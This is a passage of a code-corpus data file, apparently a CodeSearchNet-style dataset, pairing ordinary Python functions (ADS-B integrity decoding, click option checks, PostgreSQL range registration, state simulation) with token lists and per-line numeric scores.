0.03636363636363636,
0,
0.04081632653061224,
0.047619047619047616,
0.0392156862745098,
0.0392156862745098,
0,
0.05263157894736842
] |
def require_option(current_ctx: click.Context, param_name: str) -> None:
"""Throw an exception if an option wasn't required. This is useful when its
optional in some contexts but required for a subcommand"""
ctx = current_ctx
param_definition = None
while ctx is not None:
# ctx.command.params has the actual definition of the param. We use
# this when raising the exception.
param_definition = next(
(p for p in ctx.command.params if p.name == param_name), None
)
# ctx.params has the current value of the parameter, as set by the user.
if ctx.params.get(param_name):
return
ctx = ctx.parent
assert param_definition, f"unknown parameter {param_name}"
raise click.MissingParameter(ctx=current_ctx, param=param_definition) | [
"def",
"require_option",
"(",
"current_ctx",
":",
"click",
".",
"Context",
",",
"param_name",
":",
"str",
")",
"->",
"None",
":",
"ctx",
"=",
"current_ctx",
"param_definition",
"=",
"None",
"while",
"ctx",
"is",
"not",
"None",
":",
"# ctx.command.params has the actual definition of the param. We use",
"# this when raising the exception.",
"param_definition",
"=",
"next",
"(",
"(",
"p",
"for",
"p",
"in",
"ctx",
".",
"command",
".",
"params",
"if",
"p",
".",
"name",
"==",
"param_name",
")",
",",
"None",
")",
"# ctx.params has the current value of the parameter, as set by the user.",
"if",
"ctx",
".",
"params",
".",
"get",
"(",
"param_name",
")",
":",
"return",
"ctx",
"=",
"ctx",
".",
"parent",
"assert",
"param_definition",
",",
"f\"unknown parameter {param_name}\"",
"raise",
"click",
".",
"MissingParameter",
"(",
"ctx",
"=",
"current_ctx",
",",
"param",
"=",
"param_definition",
")"
] | 40.65 | [
0.013888888888888888,
0.02531645569620253,
0.04838709677419355,
0,
0.09523809523809523,
0.07407407407407407,
0.07692307692307693,
0.02666666666666667,
0.047619047619047616,
0.09375,
0.0273972602739726,
0.3333333333333333,
0,
0.0375,
0.05263157894736842,
0.1111111111111111,
0.08333333333333333,
0,
0.03225806451612903,
0.0273972602739726
] |
def get_channel_listing(self):
"""
serialized form for channel listing
"""
return {'name': self.name,
'key': self.channel.key,
'type': self.channel.typ,
'read_only': self.read_only,
'is_online': self.is_online(),
'actions': self.get_actions(),
'unread': self.unread_count()} | [
"def",
"get_channel_listing",
"(",
"self",
")",
":",
"return",
"{",
"'name'",
":",
"self",
".",
"name",
",",
"'key'",
":",
"self",
".",
"channel",
".",
"key",
",",
"'type'",
":",
"self",
".",
"channel",
".",
"typ",
",",
"'read_only'",
":",
"self",
".",
"read_only",
",",
"'is_online'",
":",
"self",
".",
"is_online",
"(",
")",
",",
"'actions'",
":",
"self",
".",
"get_actions",
"(",
")",
",",
"'unread'",
":",
"self",
".",
"unread_count",
"(",
")",
"}"
] | 32.666667 | [
0.03333333333333333,
0.18181818181818182,
0.046511627906976744,
0,
0.18181818181818182,
0.08823529411764706,
0.05,
0.04878048780487805,
0.045454545454545456,
0.043478260869565216,
0.043478260869565216,
0.06521739130434782
] |
def sil(msg, version):
"""Calculate SIL, Surveillance Integrity Level
Args:
msg (string): 28 bytes hexadecimal message string with TC = 29, 31
Returns:
int or string: Probability of exceeding Horizontal Radius of Containment RCu
int or string: Probability of exceeding Vertical Integrity Containment Region VPL
string: SIL supplement based on per "hour" or "sample", or 'unknown'
"""
tc = typecode(msg)
if tc not in [29, 31]:
raise RuntimeError("%s: Not a target state and status messag, \
or operation status message, expecting TC = 29 or 31" % msg)
msgbin = common.hex2bin(msg)
if tc == 29:
SIL = common.bin2int(msgbin[76:78])
elif tc == 31:
SIL = common.bin2int(msgbin[82:84])
try:
PE_RCu = uncertainty.SIL[SIL]['PE_RCu']
PE_VPL = uncertainty.SIL[SIL]['PE_VPL']
except KeyError:
PE_RCu, PE_VPL = uncertainty.NA, uncertainty.NA
base = 'unknown'
if version == 2:
if tc == 29:
SIL_SUP = common.bin2int(msgbin[39])
elif tc == 31:
SIL_SUP = common.bin2int(msgbin[86])
if SIL_SUP == 0:
base = "hour"
elif SIL_SUP == 1:
base = "sample"
return PE_RCu, PE_VPL, base | [
"def",
"sil",
"(",
"msg",
",",
"version",
")",
":",
"tc",
"=",
"typecode",
"(",
"msg",
")",
"if",
"tc",
"not",
"in",
"[",
"29",
",",
"31",
"]",
":",
"raise",
"RuntimeError",
"(",
"\"%s: Not a target state and status messag, \\\n or operation status message, expecting TC = 29 or 31\"",
"%",
"msg",
")",
"msgbin",
"=",
"common",
".",
"hex2bin",
"(",
"msg",
")",
"if",
"tc",
"==",
"29",
":",
"SIL",
"=",
"common",
".",
"bin2int",
"(",
"msgbin",
"[",
"76",
":",
"78",
"]",
")",
"elif",
"tc",
"==",
"31",
":",
"SIL",
"=",
"common",
".",
"bin2int",
"(",
"msgbin",
"[",
"82",
":",
"84",
"]",
")",
"try",
":",
"PE_RCu",
"=",
"uncertainty",
".",
"SIL",
"[",
"SIL",
"]",
"[",
"'PE_RCu'",
"]",
"PE_VPL",
"=",
"uncertainty",
".",
"SIL",
"[",
"SIL",
"]",
"[",
"'PE_VPL'",
"]",
"except",
"KeyError",
":",
"PE_RCu",
",",
"PE_VPL",
"=",
"uncertainty",
".",
"NA",
",",
"uncertainty",
".",
"NA",
"base",
"=",
"'unknown'",
"if",
"version",
"==",
"2",
":",
"if",
"tc",
"==",
"29",
":",
"SIL_SUP",
"=",
"common",
".",
"bin2int",
"(",
"msgbin",
"[",
"39",
"]",
")",
"elif",
"tc",
"==",
"31",
":",
"SIL_SUP",
"=",
"common",
".",
"bin2int",
"(",
"msgbin",
"[",
"86",
"]",
")",
"if",
"SIL_SUP",
"==",
"0",
":",
"base",
"=",
"\"hour\"",
"elif",
"SIL_SUP",
"==",
"1",
":",
"base",
"=",
"\"sample\"",
"return",
"PE_RCu",
",",
"PE_VPL",
",",
"base"
] | 28.840909 | [
0.045454545454545456,
0.04,
0,
0.2222222222222222,
0.04054054054054054,
0,
0.16666666666666666,
0.03571428571428571,
0.033707865168539325,
0.02631578947368421,
0.2857142857142857,
0.09090909090909091,
0,
0.07692307692307693,
0.056338028169014086,
0.05747126436781609,
0,
0.0625,
0,
0.125,
0.046511627906976744,
0.1111111111111111,
0.046511627906976744,
0,
0.25,
0.0425531914893617,
0.0425531914893617,
0.1,
0.03636363636363636,
0,
0.1,
0,
0.1,
0.1,
0.041666666666666664,
0.09090909090909091,
0.041666666666666664,
0,
0.08333333333333333,
0.08,
0.07692307692307693,
0.07407407407407407,
0,
0.06451612903225806
] |
def _score(estimator, Z_test, scorer):
"""Compute the score of an estimator on a given test set."""
score = scorer(estimator, Z_test)
if not isinstance(score, numbers.Number):
raise ValueError("scoring must return a number, got %s (%s) instead."
% (str(score), type(score)))
return score | [
"def",
"_score",
"(",
"estimator",
",",
"Z_test",
",",
"scorer",
")",
":",
"score",
"=",
"scorer",
"(",
"estimator",
",",
"Z_test",
")",
"if",
"not",
"isinstance",
"(",
"score",
",",
"numbers",
".",
"Number",
")",
":",
"raise",
"ValueError",
"(",
"\"scoring must return a number, got %s (%s) instead.\"",
"%",
"(",
"str",
"(",
"score",
")",
",",
"type",
"(",
"score",
")",
")",
")",
"return",
"score"
] | 47.142857 | [
0.02631578947368421,
0.03125,
0.05405405405405406,
0.044444444444444446,
0.03896103896103896,
0.07547169811320754,
0.125
] |
def parameters(self):
""" returns the default parameters """
if self._parameters is None:
self.__init()
for param in self._parameters:
if not isinstance(param['defaultValue'], BaseGPObject):
if param['dataType'] == "GPFeatureRecordSetLayer":
param['defaultValue'] = GPFeatureRecordSetLayer.fromJSON(json.dumps(param))
elif param['dataType'] == "GPString":
param['defaultValue'] = GPString.fromJSON(json.dumps(param))
elif param['dataType'] == "GPLong":
param['defaultValue'] = GPLong.fromJSON(json.dumps(param))
elif param['dataType'] == "GPDouble":
param['defaultValue'] = GPDouble.fromJSON(json.dumps(param))
elif param['dataType'] == "GPDate":
param['defaultValue'] = GPDate.fromJSON(json.dumps(param))
elif param['dataType'] == "GPBoolean":
param['defaultValue'] = GPBoolean.fromJSON(json.dumps(param))
elif param['dataType'] == "GPDataFile":
param['defaultValue'] = GPDataFile.fromJSON(json.dumps(param))
elif param['dataType'] == "GPLinearUnit":
param['defaultValue'] = GPLinearUnit.fromJSON(json.dumps(param))
elif param['dataType'] == "GPMultiValue":
param['defaultValue'] = GPMultiValue.fromJSON(json.dumps(param))
elif param['dataType'] == "GPRasterData":
param['defaultValue'] = GPRasterData.fromJSON(json.dumps(param))
elif param['dataType'] == "GPRasterDataLayer":
param['defaultValue'] = GPRasterDataLayer.fromJSON(json.dumps(param))
elif param['dataType'] == "GPRecordSet":
param['defaultValue'] = GPRecordSet.fromJSON(json.dumps(param))
return self._parameters | [
"def",
"parameters",
"(",
"self",
")",
":",
"if",
"self",
".",
"_parameters",
"is",
"None",
":",
"self",
".",
"__init",
"(",
")",
"for",
"param",
"in",
"self",
".",
"_parameters",
":",
"if",
"not",
"isinstance",
"(",
"param",
"[",
"'defaultValue'",
"]",
",",
"BaseGPObject",
")",
":",
"if",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPFeatureRecordSetLayer\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPFeatureRecordSetLayer",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPString\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPString",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPLong\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPLong",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPDouble\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPDouble",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPDate\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPDate",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPBoolean\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPBoolean",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPDataFile\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPDataFile",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPLinearUnit\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPLinearUnit",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPMultiValue\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPMultiValue",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPRasterData\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPRasterData",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPRasterDataLayer\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPRasterDataLayer",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"elif",
"param",
"[",
"'dataType'",
"]",
"==",
"\"GPRecordSet\"",
":",
"param",
"[",
"'defaultValue'",
"]",
"=",
"GPRecordSet",
".",
"fromJSON",
"(",
"json",
".",
"dumps",
"(",
"param",
")",
")",
"return",
"self",
".",
"_parameters"
] | 62.387097 | [
0.047619047619047616,
0.043478260869565216,
0.05555555555555555,
0.08,
0.05263157894736842,
0.029850746268656716,
0.030303030303030304,
0.031578947368421054,
0.03773584905660377,
0.0375,
0.0392156862745098,
0.02564102564102564,
0.03773584905660377,
0.0375,
0.0392156862745098,
0.02564102564102564,
0.037037037037037035,
0.037037037037037035,
0.03636363636363636,
0.036585365853658534,
0.03508771929824561,
0.03571428571428571,
0.03508771929824561,
0.03571428571428571,
0.03508771929824561,
0.03571428571428571,
0.03225806451612903,
0.033707865168539325,
0.03571428571428571,
0.03614457831325301,
0.06451612903225806
] |
def deserialize(obj):
"""Convert JSON dicts back into objects."""
# Be careful of shallow copy here
target = dict(obj)
class_name = None
if '__class__' in target:
class_name = target.pop('__class__')
if '__module__' in obj:
obj.pop('__module__')
# Use getattr(module, class_name) for custom types if needed
if class_name == 'datetime':
return datetime.datetime(tzinfo=utc, **target)
if class_name == 'StreamingBody':
return StringIO(target['body'])
# Return unrecognized structures as-is
return obj | [
"def",
"deserialize",
"(",
"obj",
")",
":",
"# Be careful of shallow copy here",
"target",
"=",
"dict",
"(",
"obj",
")",
"class_name",
"=",
"None",
"if",
"'__class__'",
"in",
"target",
":",
"class_name",
"=",
"target",
".",
"pop",
"(",
"'__class__'",
")",
"if",
"'__module__'",
"in",
"obj",
":",
"obj",
".",
"pop",
"(",
"'__module__'",
")",
"# Use getattr(module, class_name) for custom types if needed",
"if",
"class_name",
"==",
"'datetime'",
":",
"return",
"datetime",
".",
"datetime",
"(",
"tzinfo",
"=",
"utc",
",",
"*",
"*",
"target",
")",
"if",
"class_name",
"==",
"'StreamingBody'",
":",
"return",
"StringIO",
"(",
"target",
"[",
"'body'",
"]",
")",
"# Return unrecognized structures as-is",
"return",
"obj"
] | 34.9375 | [
0.047619047619047616,
0.0425531914893617,
0.05405405405405406,
0.09090909090909091,
0.09523809523809523,
0.06896551724137931,
0.045454545454545456,
0.07407407407407407,
0.06896551724137931,
0.03125,
0.0625,
0.037037037037037035,
0.05405405405405406,
0.05128205128205128,
0.047619047619047616,
0.14285714285714285
] |
def open(self, mode='r', buffering=-1, encoding=None,
errors=None, newline=None):
"""Open the file pointed by this path and return a fake file object.
Raises:
IOError: if the target object is a directory, the path is invalid
or permission is denied.
"""
if self._closed:
self._raise_closed()
return FakeFileOpen(self.filesystem, use_io=True)(
self._path(), mode, buffering, encoding, errors, newline) | [
"def",
"open",
"(",
"self",
",",
"mode",
"=",
"'r'",
",",
"buffering",
"=",
"-",
"1",
",",
"encoding",
"=",
"None",
",",
"errors",
"=",
"None",
",",
"newline",
"=",
"None",
")",
":",
"if",
"self",
".",
"_closed",
":",
"self",
".",
"_raise_closed",
"(",
")",
"return",
"FakeFileOpen",
"(",
"self",
".",
"filesystem",
",",
"use_io",
"=",
"True",
")",
"(",
"self",
".",
"_path",
"(",
")",
",",
"mode",
",",
"buffering",
",",
"encoding",
",",
"errors",
",",
"newline",
")"
] | 41.25 | [
0.03773584905660377,
0.15,
0.02631578947368421,
0,
0.13333333333333333,
0.025974025974025976,
0.05,
0.18181818181818182,
0.08333333333333333,
0.0625,
0.05172413793103448,
0.043478260869565216
] |
def generate_states(state_count, process_matrix, process_covariance,
initial_state=None):
"""
Generate states by simulating a linear system with constant process matrix
and process noise covariance.
Args:
state_count (int): Number of states to generate.
process_matrix (array): Square array
process_covariance (array): Square array specifying process noise
covariance.
initial_state (array or None): If omitted, use zero-filled vector as
initial state.
"""
# Sanitise input
process_matrix = np.atleast_2d(process_matrix)
process_covariance = np.atleast_2d(process_covariance)
state_dim = process_matrix.shape[0]
if process_matrix.shape != (state_dim, state_dim):
raise ValueError("Process matrix has inconsistent shape: {}".format(
process_matrix.shape))
if process_covariance.shape != (state_dim, state_dim):
raise ValueError("Process covariance has inconsistent shape: {}".format(
process_covariance.shape))
if initial_state is None:
initial_state = np.zeros(process_matrix.shape[0])
states = [initial_state]
while len(states) < state_count:
states.append(
process_matrix.dot(states[-1]) + np.random.multivariate_normal(
mean=np.zeros(state_dim), cov=process_covariance
)
)
return np.vstack(states) | [
"def",
"generate_states",
"(",
"state_count",
",",
"process_matrix",
",",
"process_covariance",
",",
"initial_state",
"=",
"None",
")",
":",
"# Sanitise input",
"process_matrix",
"=",
"np",
".",
"atleast_2d",
"(",
"process_matrix",
")",
"process_covariance",
"=",
"np",
".",
"atleast_2d",
"(",
"process_covariance",
")",
"state_dim",
"=",
"process_matrix",
".",
"shape",
"[",
"0",
"]",
"if",
"process_matrix",
".",
"shape",
"!=",
"(",
"state_dim",
",",
"state_dim",
")",
":",
"raise",
"ValueError",
"(",
"\"Process matrix has inconsistent shape: {}\"",
".",
"format",
"(",
"process_matrix",
".",
"shape",
")",
")",
"if",
"process_covariance",
".",
"shape",
"!=",
"(",
"state_dim",
",",
"state_dim",
")",
":",
"raise",
"ValueError",
"(",
"\"Process covariance has inconsistent shape: {}\"",
".",
"format",
"(",
"process_covariance",
".",
"shape",
")",
")",
"if",
"initial_state",
"is",
"None",
":",
"initial_state",
"=",
"np",
".",
"zeros",
"(",
"process_matrix",
".",
"shape",
"[",
"0",
"]",
")",
"states",
"=",
"[",
"initial_state",
"]",
"while",
"len",
"(",
"states",
")",
"<",
"state_count",
":",
"states",
".",
"append",
"(",
"process_matrix",
".",
"dot",
"(",
"states",
"[",
"-",
"1",
"]",
")",
"+",
"np",
".",
"random",
".",
"multivariate_normal",
"(",
"mean",
"=",
"np",
".",
"zeros",
"(",
"state_dim",
")",
",",
"cov",
"=",
"process_covariance",
")",
")",
"return",
"np",
".",
"vstack",
"(",
"states",
")"
] | 35.2 | [
0.029411764705882353,
0.1,
0.2857142857142857,
0.02564102564102564,
0.06060606060606061,
0,
0.2222222222222222,
0.05357142857142857,
0.06818181818181818,
0.0410958904109589,
0.08695652173913043,
0.039473684210526314,
0.07692307692307693,
0,
0.2857142857142857,
0.1,
0.04,
0.034482758620689655,
0.05128205128205128,
0,
0.037037037037037035,
0.039473684210526314,
0.08823529411764706,
0,
0.034482758620689655,
0.05,
0.07894736842105263,
0,
0.06896551724137931,
0.03508771929824561,
0,
0.07142857142857142,
0.05555555555555555,
0.13636363636363635,
0.04,
0.0625,
0.23076923076923078,
0.3333333333333333,
0,
0.07142857142857142
] |
def fix_deplist(deps):
""" Turn a dependency list into lowercase, and make sure all entries
that are just a string become a tuple of strings
"""
deps = [
((dep.lower(),)
if not isinstance(dep, (list, tuple))
else tuple([dep_entry.lower()
for dep_entry in dep
]))
for dep in deps
]
return deps | [
"def",
"fix_deplist",
"(",
"deps",
")",
":",
"deps",
"=",
"[",
"(",
"(",
"dep",
".",
"lower",
"(",
")",
",",
")",
"if",
"not",
"isinstance",
"(",
"dep",
",",
"(",
"list",
",",
"tuple",
")",
")",
"else",
"tuple",
"(",
"[",
"dep_entry",
".",
"lower",
"(",
")",
"for",
"dep_entry",
"in",
"dep",
"]",
")",
")",
"for",
"dep",
"in",
"deps",
"]",
"return",
"deps"
] | 29.461538 | [
0.045454545454545456,
0.027777777777777776,
0.03571428571428571,
0.2857142857142857,
0.25,
0.13043478260869565,
0.06521739130434782,
0.10526315789473684,
0.07317073170731707,
0.13043478260869565,
0.08695652173913043,
0.6,
0.13333333333333333
] |
def get_connection(self, host, port):
"""
Returns a ``StrictRedis`` connection instance.
"""
return beanstalkc.Connection(
host=host,
port=port
) | [
"def",
"get_connection",
"(",
"self",
",",
"host",
",",
"port",
")",
":",
"return",
"beanstalkc",
".",
"Connection",
"(",
"host",
"=",
"host",
",",
"port",
"=",
"port",
")"
] | 25.25 | [
0.02702702702702703,
0.18181818181818182,
0.05555555555555555,
0.18181818181818182,
0.08108108108108109,
0.13636363636363635,
0.14285714285714285,
0.3333333333333333
] |
def magnitude(self):
"""
Lenght/norm/magnitude of vector representation of document.
This is usually denoted by ||d||.
"""
return math.sqrt(sum(t**2 for t in self._terms.values())) | [
"def",
"magnitude",
"(",
"self",
")",
":",
"return",
"math",
".",
"sqrt",
"(",
"sum",
"(",
"t",
"**",
"2",
"for",
"t",
"in",
"self",
".",
"_terms",
".",
"values",
"(",
")",
")",
")"
] | 35.833333 | [
0.05,
0.18181818181818182,
0.029850746268656716,
0.0975609756097561,
0.18181818181818182,
0.03076923076923077
] |
def register_range_type(pgrange, pyrange, conn):
"""
Register a new range type as a PostgreSQL range.
>>> register_range_type("int4range", intrange, conn)
The above will make sure intrange is regarded as an int4range for queries
and that int4ranges will be cast into intrange when fetching rows.
pgrange should be the full name including schema for the custom range type.
Note that adaption is global, meaning if a range type is passed to a regular
psycopg2 connection it will adapt it to its proper range type. Parsing of
rows from the database however is not global and just set on a per connection
basis.
"""
register_adapter(pyrange, partial(adapt_range, pgrange))
register_range_caster(
pgrange, pyrange, *query_range_oids(pgrange, conn), scope=conn) | [
"def",
"register_range_type",
"(",
"pgrange",
",",
"pyrange",
",",
"conn",
")",
":",
"register_adapter",
"(",
"pyrange",
",",
"partial",
"(",
"adapt_range",
",",
"pgrange",
")",
")",
"register_range_caster",
"(",
"pgrange",
",",
"pyrange",
",",
"*",
"query_range_oids",
"(",
"pgrange",
",",
"conn",
")",
",",
"scope",
"=",
"conn",
")"
] | 40.25 | [
0.020833333333333332,
0.2857142857142857,
0.038461538461538464,
0,
0.05,
0,
0.025974025974025976,
0.02857142857142857,
0,
0.02531645569620253,
0,
0.0375,
0.025974025974025976,
0.037037037037037035,
0.2,
0.2857142857142857,
0,
0.03333333333333333,
0.11538461538461539,
0.056338028169014086
] |
def get_rule_table(rules):
"""Formats output from get_all_rules and returns a table. """
table = formatting.Table(['Id', 'KeyName'], "Rules")
for rule in rules:
table.add_row([rule['id'], rule['keyName']])
return table | [
"def",
"get_rule_table",
"(",
"rules",
")",
":",
"table",
"=",
"formatting",
".",
"Table",
"(",
"[",
"'Id'",
",",
"'KeyName'",
"]",
",",
"\"Rules\"",
")",
"for",
"rule",
"in",
"rules",
":",
"table",
".",
"add_row",
"(",
"[",
"rule",
"[",
"'id'",
"]",
",",
"rule",
"[",
"'keyName'",
"]",
"]",
")",
"return",
"table"
] | 39.5 | [
0.038461538461538464,
0.03076923076923077,
0.03571428571428571,
0.09090909090909091,
0.038461538461538464,
0.125
] |
def _get_graph(graph, filename):
"""Retrieve or render a graph."""
try:
rendered = graph.rendered_file
except AttributeError:
try:
graph.render(os.path.join(server.tmpdir, filename), format='png')
rendered = filename
except OSError:
rendered = None
graph.rendered_file = rendered
return rendered | [
"def",
"_get_graph",
"(",
"graph",
",",
"filename",
")",
":",
"try",
":",
"rendered",
"=",
"graph",
".",
"rendered_file",
"except",
"AttributeError",
":",
"try",
":",
"graph",
".",
"render",
"(",
"os",
".",
"path",
".",
"join",
"(",
"server",
".",
"tmpdir",
",",
"filename",
")",
",",
"format",
"=",
"'png'",
")",
"rendered",
"=",
"filename",
"except",
"OSError",
":",
"rendered",
"=",
"None",
"graph",
".",
"rendered_file",
"=",
"rendered",
"return",
"rendered"
] | 30.333333 | [
0.03125,
0.05405405405405406,
0.25,
0.05263157894736842,
0.07692307692307693,
0.16666666666666666,
0.025974025974025976,
0.06451612903225806,
0.08695652173913043,
0.07407407407407407,
0.058823529411764705,
0.10526315789473684
] |
def sparse_grid_from_unmasked_sparse_grid(unmasked_sparse_grid, sparse_to_unmasked_sparse):
"""Use the central arc-second coordinate of every unmasked pixelization grid's pixels and mapping between each
pixelization pixel and unmasked pixelization pixel to compute the central arc-second coordinate of every masked
pixelization grid pixel.
Parameters
-----------
unmasked_sparse_grid : ndarray
The (y,x) arc-second centre of every unmasked pixelization grid pixel.
sparse_to_unmasked_sparse : ndarray
The index mapping between every pixelization pixel and masked pixelization pixel.
"""
total_pix_pixels = sparse_to_unmasked_sparse.shape[0]
pix_grid = np.zeros((total_pix_pixels, 2))
for pixel_index in range(total_pix_pixels):
pix_grid[pixel_index, 0] = unmasked_sparse_grid[sparse_to_unmasked_sparse[pixel_index], 0]
pix_grid[pixel_index, 1] = unmasked_sparse_grid[sparse_to_unmasked_sparse[pixel_index], 1]
return pix_grid | [
"def",
"sparse_grid_from_unmasked_sparse_grid",
"(",
"unmasked_sparse_grid",
",",
"sparse_to_unmasked_sparse",
")",
":",
"total_pix_pixels",
"=",
"sparse_to_unmasked_sparse",
".",
"shape",
"[",
"0",
"]",
"pix_grid",
"=",
"np",
".",
"zeros",
"(",
"(",
"total_pix_pixels",
",",
"2",
")",
")",
"for",
"pixel_index",
"in",
"range",
"(",
"total_pix_pixels",
")",
":",
"pix_grid",
"[",
"pixel_index",
",",
"0",
"]",
"=",
"unmasked_sparse_grid",
"[",
"sparse_to_unmasked_sparse",
"[",
"pixel_index",
"]",
",",
"0",
"]",
"pix_grid",
"[",
"pixel_index",
",",
"1",
"]",
"=",
"unmasked_sparse_grid",
"[",
"sparse_to_unmasked_sparse",
"[",
"pixel_index",
"]",
",",
"1",
"]",
"return",
"pix_grid"
] | 47.095238 | [
0.02197802197802198,
0.02631578947368421,
0.02608695652173913,
0.07142857142857142,
0,
0.14285714285714285,
0.13333333333333333,
0.08823529411764706,
0.05128205128205128,
0.07692307692307693,
0.033707865168539325,
0.2857142857142857,
0.03508771929824561,
0,
0.043478260869565216,
0,
0.0425531914893617,
0.030612244897959183,
0.030612244897959183,
0,
0.10526315789473684
] |
def post(self, request, *args, **kwargs):
""" Validates subscription data before creating Outbound message
"""
# Look up subscriber
subscription_id = kwargs["subscription_id"]
if Subscription.objects.filter(id=subscription_id).exists():
status = 202
accepted = {"accepted": True}
store_resend_request.apply_async(args=[subscription_id])
else:
status = 400
accepted = {
"accepted": False,
"reason": "Cannot find subscription with ID {}".format(subscription_id),
}
return Response(accepted, status=status) | [
"def",
"post",
"(",
"self",
",",
"request",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"# Look up subscriber",
"subscription_id",
"=",
"kwargs",
"[",
"\"subscription_id\"",
"]",
"if",
"Subscription",
".",
"objects",
".",
"filter",
"(",
"id",
"=",
"subscription_id",
")",
".",
"exists",
"(",
")",
":",
"status",
"=",
"202",
"accepted",
"=",
"{",
"\"accepted\"",
":",
"True",
"}",
"store_resend_request",
".",
"apply_async",
"(",
"args",
"=",
"[",
"subscription_id",
"]",
")",
"else",
":",
"status",
"=",
"400",
"accepted",
"=",
"{",
"\"accepted\"",
":",
"False",
",",
"\"reason\"",
":",
"\"Cannot find subscription with ID {}\"",
".",
"format",
"(",
"subscription_id",
")",
",",
"}",
"return",
"Response",
"(",
"accepted",
",",
"status",
"=",
"status",
")"
] | 40.5 | [
0.024390243902439025,
0.027777777777777776,
0.18181818181818182,
0.07142857142857142,
0.0392156862745098,
0.029411764705882353,
0.08333333333333333,
0.04878048780487805,
0.029411764705882353,
0.15384615384615385,
0.08333333333333333,
0.125,
0.058823529411764705,
0.03409090909090909,
0.23076923076923078,
0.041666666666666664
] |
def _post(self, *args, **kwargs):
"""
Make a POST request.
"""
data = self._default_data()
data.update(kwargs.get('data') or {})
kwargs['data'] = data
return self._request(requests.post, *args, **kwargs) | [
"def",
"_post",
"(",
"self",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"data",
"=",
"self",
".",
"_default_data",
"(",
")",
"data",
".",
"update",
"(",
"kwargs",
".",
"get",
"(",
"'data'",
")",
"or",
"{",
"}",
")",
"kwargs",
"[",
"'data'",
"]",
"=",
"data",
"return",
"self",
".",
"_request",
"(",
"requests",
".",
"post",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")"
] | 31.5 | [
0.030303030303030304,
0.18181818181818182,
0.07142857142857142,
0.18181818181818182,
0.05714285714285714,
0.044444444444444446,
0.06896551724137931,
0.03333333333333333
] |
def AsDict(self, dt=True):
"""
A dict representation of this Shake instance.
The return value uses the same key names as the JSON representation.
Args:
dt (bool): If True, return dates as python datetime objects. If
False, return dates as ISO strings.
Return:
A dict representing this Shake instance
"""
data = {}
if self.sharekey:
data['sharekey'] = self.sharekey
if self.name:
data['name'] = self.name
if self.user:
data['user'] = self.user.AsDict()
if self.title:
data['title'] = self.title
if self.description:
data['description'] = self.description
if self.posted_at:
if dt:
data['posted_at'] = self.posted_at
else:
data['posted_at'] = self.posted_at_iso
if self.permalink:
data['permalink'] = self.permalink
if self.width:
data['width'] = self.width
if self.height:
data['height'] = self.height
if self.image_url:
data['image_url'] = self.image_url
if self.source_url:
data['source_url'] = self.source_url
data['views'] = self.views
data['likes'] = self.likes
data['saves'] = self.saves
data['comments'] = self.comments
data['nsfw'] = self.nsfw
data['saved'] = self.saved
data['liked'] = self.liked
return data | [
"def",
"AsDict",
"(",
"self",
",",
"dt",
"=",
"True",
")",
":",
"data",
"=",
"{",
"}",
"if",
"self",
".",
"sharekey",
":",
"data",
"[",
"'sharekey'",
"]",
"=",
"self",
".",
"sharekey",
"if",
"self",
".",
"name",
":",
"data",
"[",
"'name'",
"]",
"=",
"self",
".",
"name",
"if",
"self",
".",
"user",
":",
"data",
"[",
"'user'",
"]",
"=",
"self",
".",
"user",
".",
"AsDict",
"(",
")",
"if",
"self",
".",
"title",
":",
"data",
"[",
"'title'",
"]",
"=",
"self",
".",
"title",
"if",
"self",
".",
"description",
":",
"data",
"[",
"'description'",
"]",
"=",
"self",
".",
"description",
"if",
"self",
".",
"posted_at",
":",
"if",
"dt",
":",
"data",
"[",
"'posted_at'",
"]",
"=",
"self",
".",
"posted_at",
"else",
":",
"data",
"[",
"'posted_at'",
"]",
"=",
"self",
".",
"posted_at_iso",
"if",
"self",
".",
"permalink",
":",
"data",
"[",
"'permalink'",
"]",
"=",
"self",
".",
"permalink",
"if",
"self",
".",
"width",
":",
"data",
"[",
"'width'",
"]",
"=",
"self",
".",
"width",
"if",
"self",
".",
"height",
":",
"data",
"[",
"'height'",
"]",
"=",
"self",
".",
"height",
"if",
"self",
".",
"image_url",
":",
"data",
"[",
"'image_url'",
"]",
"=",
"self",
".",
